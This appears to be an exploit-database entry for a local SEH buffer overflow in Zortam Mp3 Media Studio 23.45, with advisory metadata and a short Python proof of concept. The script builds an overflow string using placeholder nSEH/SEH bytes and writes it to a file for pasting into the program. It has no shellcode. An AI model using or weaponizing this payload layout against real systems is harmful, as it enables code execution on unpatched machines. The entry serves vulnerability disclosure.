header-logo
Suggest Exploit
vendor:
Zortam Mp3 Media Studio
by:
Kevin McGuigan
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Zortam Mp3 Media Studio
Affected Version From: 23.45
Affected Version To: 23.45
Patch Exists: NO
Related CWE: N/A
CPE: a:zortam:zortam_mp3_media_studio
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 32 bit
2018

Zortam Mp3 Media Studio Local Buffer Overflow (SEH)

A buffer overflow vulnerability exists in Zortam Mp3 Media Studio version 23.45. By crafting a malicious string and pasting it into the directory field of the 'Add Disk to Mp3 Library' feature, an attacker can cause a stack-based buffer overflow, resulting in arbitrary code execution.

Mitigation:

Vendor did not respond to advisory
Source

Exploit-DB raw data:

#!/usr/bin/python
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.zortam.com/
# Version: 23.45
# Tested on: Windows 7 32 bit
# Date: 12/04/2018
# Vendor did not respond to advisory


# File > Add Disk to Mp3 Library > paste string from zortamPOC.txt into directory field
filename="zortamPOC.txt"
junk = "A" * 268
nseh = "B" * 4
seh="C" * 4
fill = "D" *900
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()